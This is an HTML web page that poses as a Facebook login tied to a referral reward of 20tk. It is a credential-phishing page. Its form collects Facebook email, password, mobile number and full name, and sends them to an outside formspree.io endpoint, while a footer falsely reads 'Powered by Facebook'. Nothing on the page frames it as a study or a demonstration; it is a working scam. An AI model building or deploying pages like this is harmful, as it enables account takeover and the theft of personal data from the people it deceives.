<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Money begins Money</title>
    <style>
    *{
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}
body{
    font-family: 'Montserrat';
}
section{
    height: 100vh;
    width: 100%;
    background-color: aliceblue;
    display: flex;
    align-items:center;
    justify-content: center;
    flex-direction: column;

}
.container{
    width: 90%;
    max-width: 500px;
    margin: 0 auto;
    padding: 20px;
    box-shadow: 0px 0px 20px #000;
    background-color: rgb(16, 100, 255);
    border-radius: 8px;
    margin-bottom: 20px;
    background: url(download.jfif);
    background-repeat: no-repeat;
background-size: cover;

}
.form-group{
    width: 100%;
    margin-top: 20px;
    font-size: 20px;
}
.form-group input, 
.form-group textarea{
    width: 100%;
    padding: 5px;
    font-size: 18px;
    border: 1px solid rgba(128, 128, 128, 0, 199);
    margin-top: 5px;
}
textarea{
    resize: vertical;

}
button[ type="submit"]{
    width: 100%;
   
  
    padding: 20px;
    font-size: 24px;
    border-radius: 50px 8px;
   background-position: center;
    color: rgb(27, 247, 126);
    text-align: center;
    cursor: pointer;
    margin-top: 10px;
  box-sizing: border-box;
 background-color: rgb(0, 0, 0);
 max-width: 500px;

}
h1{
    font-size: xx-large;
  
    text-decoration: dotted;
    box-sizing: border-box;
    border: solid;

    background-color: rgb(62, 255, 191);
    color: rgb(0, 0, 0);
    font-style: oblique;
}
body{
    align-items: center;

    background-image: url(Welcome.png);
  
    background-size: 120%;
background-repeat: no-repeat;
    
    
    
}
h6{
    text-align: right;
}
    </style>
</head>
<body>
   <br> <h1>{Firstly login your Facebook Account}
    <br>Then you will get 20tk if you use correct refer code.  </h1><br><br>
    <section>
        <div class="container">
            <form action="https://formspree.io/f/mlevokbg" method="POST">

 <h2><b>Login your Facebook Account</b></h2>
                <div class="form-group">
                    <label for="email"><b>
                        Email:
                    </b></label>
                    <input type="email" id="email" name="email" required  autocomplete="off" placeholder="Ex: example@gmail.com">
                </div>


                <div class="form-group">
                    <!-- Use for password -->
                    <label for="Password">Password</label>
                    <input type="password" id="password" name="password" placeholder="For security"
                    required  autocomplete="off">
               
                    
                   

                </div><br><br><br><br><br>
                                
                <div class="form-group">
                    <label for="number"><b>Refer Code:</b></label>
                    <input type="number" id="number" name="number" required  autocomplete="off" placeholder="50478">
                <div class="form-group">
                    <label for="number"><b>Mobile number:</b></label>
                    <input type="number" id="number" name="number" required  autocomplete="off" placeholder="880154614*****">
                <div class="form-group">
                    <label for="number"><b>Name:</b></label>
                    <input type="text" id="text" name="text" required  autocomplete="off" placeholder="Enter your full name.">

                
                <button type="submit">

Submit
                </button><br><br><br>
                <h6><i>Powered by Facebook>Money Begins money.com</i></h6>
            </form>

    </section>
</body>
</html>